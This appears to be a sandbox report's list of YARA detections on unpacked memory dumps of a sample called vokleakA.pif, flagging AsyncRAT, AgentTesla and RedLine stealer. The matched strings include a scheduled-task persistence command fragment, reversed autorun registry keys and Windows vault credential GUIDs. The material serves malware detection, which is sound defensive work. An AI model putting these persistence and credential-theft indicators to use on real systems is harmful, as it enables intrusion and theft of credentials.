7.3.vokleakA.pif.2436fa40.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.3.vokleakA.pif.2436fa40.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.1.vokleakA.pif.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.1.vokleakA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
9.3.vokleakA.pif.2ff3d950.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.3.vokleakA.pif.2ff3d950.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.3.vokleakA.pif.2ff3d950.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.3.vokleakA.pif.2ff3d950.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.3.vokleakA.pif.2ff3d950.0.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
9.3.vokleakA.pif.2ff3d950.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.3.vokleakA.pif.2ff3d950.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.284a0ee8.6.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.284a0ee8.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.284a0ee8.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.31b94ec6.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.284a0ee8.6.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
9.2.vokleakA.pif.31b94ec6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.31b94ec6.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.284a0ee8.6.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.284a0ee8.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.31b94ec6.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
9.2.vokleakA.pif.31b94ec6.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.31b94ec6.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.31e40ee8.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31e40ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31e40ee8.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31e40ee8.4.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
4.2.vokleakA.pif.31e40ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31e40ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.32ef6458.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.32ef6458.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.32ef6458.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.32ef6458.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.32ef6458.3.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9e787:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0xad170:$a2: Stub.exe 0xad200:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x95a04:$a3: get_ActivatePong 0x47867:$a4: vmware 0x9e99f:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9e817:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient 0x95929:$a6: get_SslClient
9.2.vokleakA.pif.32ef6458.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9e819:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.32ef6458.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x9f3f8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x9f46a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x9f4f4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x9f586:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9f5f0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x9f662:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x9f6f8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x9f788:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.31e40000.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31e40000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31e40000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.31e40000.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31e40000.3.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
4.2.vokleakA.pif.31e40000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31e40000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.26fc6458.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.26fc6458.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.26fc6458.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.26fc6458.4.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
7.2.vokleakA.pif.26fc6458.4.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.26fc6458.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.3.vokleakA.pif.2436fa40.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.3.vokleakA.pif.2436fa40.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.vokleakA.pif.2436fa40.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.3.vokleakA.pif.2436fa40.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.3.vokleakA.pif.2436fa40.0.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
7.3.vokleakA.pif.2436fa40.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.3.vokleakA.pif.2436fa40.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.33005570.7.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.33005570.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.33005570.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.33005570.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.33005570.7.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9f66f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0xae058:$a2: Stub.exe 0xae0e8:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x968ec:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x9f887:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9f6ff:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient 0x96811:$a6: get_SslClient
4.2.vokleakA.pif.33005570.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9f701:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.33005570.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa02e0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa0352:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa03dc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa046e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa04d8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa054a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa05e0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0xa0670:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.31b93fde.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.31b93fde.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.31b93fde.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.31b93fde.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
9.2.vokleakA.pif.31b93fde.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.31b93fde.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.33006458.6.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.33006458.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.33006458.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.33006458.6.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
4.2.vokleakA.pif.33006458.6.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.33006458.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.25de4ec6.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.25de4ec6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.25de4ec6.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.25de4ec6.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
7.2.vokleakA.pif.25de4ec6.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.25de4ec6.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.31be4ec6.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31be4ec6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31be4ec6.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31be4ec6.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
4.2.vokleakA.pif.31be4ec6.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31be4ec6.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
